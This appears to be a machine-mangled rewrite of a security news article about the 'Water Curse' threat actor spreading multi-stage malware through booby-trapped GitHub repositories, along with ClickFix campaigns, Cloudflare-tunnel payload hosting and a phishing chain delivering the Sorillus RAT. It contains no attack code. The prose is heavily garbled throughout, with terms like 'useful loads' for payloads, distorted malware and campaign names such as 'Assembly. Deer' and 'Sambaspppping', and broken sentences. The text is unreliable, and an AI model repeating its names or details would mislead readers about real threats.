Cybersecurity researchers have exposed a previously unknown actor of a threat known as the curse of water relies on the GitHub armed repository to deliver multi -stage malicious software.
“Malicious software provides data operation (including powers, browser data and tokens), remote access and long-term resistance on infected systems,”-Trend Micro Jovit Samaniego, Aira Marcelo, Mohamed Fahmy and Gabriel Nicoleta – Note In an analysis published this week.
The company “broad and sustainable”, first noticed last month, created repository offered by seemingly harmless utilities for penetration testing, but were in their Visual Studio Project configuration settings such as SMTP Email Bomber and Sakura Rat.
Arsenal Water Verate includes a wide range of programming tools and programming languages, emphasizing their interfunctional development capabilities to focus on the supply chain using “theft -oriented developer that blur the line between the red team tools and the active distribution of malicious programs”.
“After performing the harmful useful loads initiated complex multi -stage infection networks using embarrassed scripts written in Visual Basic (VBS) and PowerShell,” the researchers said. “These scenarios loaded the encrypted archives, extracted electronic applications based on electrons and performed a wide system.”
The attacks are also characterized by the use of the techniques against the introduction of the introduction, the methods of escalation of privileges and mechanisms of perseverance to maintain long -term fixing on the affected hosts. PowerShell scenarios are also used to weaken the host protection and inhibit the system recovery.
The curse of water was described as a financially motivated actor of the threat, which is caused by the theft, the abduction of sessions and resale of illegal access. As many as 76 GITHUB accounts were linked to the company. There are data that suggest that related activity can continue throughout March 2023.
The appearance of a curse of water is the last example of how the threat subjects abuse the trust associated with legal platforms such as GITHUB as the delivery channel for malware and stage attacks of software supply chains.
“Their shelters include malicious software, evasion, game cleaning, Aimbots, wallet, scrapers, spam and theft,” said Trend Micro. “This reflects a multiple targeting strategy that combines cybercrime with conjunctural monetization.”
“Their infrastructure and behavior indicate the focus on the steadiness, automation and scalability, with active expansion through telegram and file distribution services.”
Disclosure occurs when there are several companies that use common Clickfix Strategy deploying different families malware such as Assembly. Deer (through a loader named Loader), Filch theft. LightPerlgirland Sector (Also through the loader hijack).
Osyncrat – one of many available trojans (rats) that was used unspecified documented According to ForcePoint in August 2024 and January 2025.
“This TradeCraft allows for malicious software to bypass the traditional perimeter protection, especially using cloudflare tunnels for useful loads from seemingly legitimate infrastructure,” Halcyon – Note. “These tunnels give attackers epophmeal and unregistered subdomena, which seem reliable around the perimeter of control, which makes it difficult to block or blacklist.”
“As the infrastructure is dynamically promoted by legitimate services, the defenders face problems in the kind of malicious use from the authorized Devops or IT labor processes. This tactic allows the subjects to ensure useful loads, without relying on the disturbed servers or bulletproof hosting.”
The conclusions also follow revelation About the current malicious campaign aimed at various European organizations located in Spain, Portugal, Italy, France, Belgium and the Netherlands with the bills to deliver the said Rat Sorilus (he Rat Rat).
Previous companies that distribute malicious software nominated Accounting and tax experts The use of income Bait tax returnSome of which used HTML smuggling methods to hide the harmful useful loads.
In the attack chain, detailed Orange Cyberdefense, such phishing sheets are used to trick the recipients to open the PDF attachments containing the OneDrive link, which indicates the PDF file directly placed on the Cloud Storage service, while pushing the user to click the document. “
This redirects the victim to the malicious web -server that acts as a traffic distribution system (TDS) to evaluate the incoming request and determine whether they need to continue until the next stage of the infection. If the victim’s machine meets the necessary criteria, they are displayed benign PDF, while the Jar file is roughly loaded to drop and perform the Sorillus Rat.
A rat based on Java, which first appeared in 2019, Sorillus is an interplatform malicious software that can collect sensitive information, download/download files, take screenshots, record audio, launch arbitrary commands and even give out. It also does not help that many versions of Trojan are available online.
Attacks are rated as part of a wider company observed Sambaspppping For Italy users. Sambasppi, for the Orange Cyberdefense, belongs to the Sorillus malware.
“The operation demonstrates a strategic blend of legitimate services – such as OneDrive, Mediafire and tunnel platforms such as NGROK and Localtonet – to avoid detection,” the cybersecurity campaign said. “The repeated use of the Brazilian Portuguese language in useful loads supports the likely assignment of Brazilian -speaking subjects of the threat.”
